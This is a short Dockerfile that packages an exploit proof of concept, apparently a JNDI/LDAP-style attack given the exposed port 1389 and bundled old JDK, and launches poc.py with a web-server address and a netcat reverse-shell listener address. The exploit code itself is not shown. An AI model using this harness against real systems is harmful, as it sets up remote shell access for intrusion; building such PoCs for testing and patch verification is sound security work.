FROM python:3.10.1-bullseye

ENV RSHELL_PORT="9001"
ENV RSHELL_IP="host.docker.internal"
ENV WEB_IP="host.docker.internal"

EXPOSE 8000/tcp
EXPOSE 1389/tcp

RUN adduser --group poc --system --home /home/poc --shell /bin/bash
USER poc

COPY poc.py /home/poc/poc.py
COPY requirements.txt /home/poc/requirements.txt
COPY target /home/poc/target
COPY jdk1.8.0_20 /home/poc/jdk1.8.0_20

WORKDIR /home/poc
RUN pip3 install -r requirements.txt

CMD python3 poc.py --webip $WEB_IP --webport 8000 --ncip $RSHELL_IP --ncport $RSHELL_PORT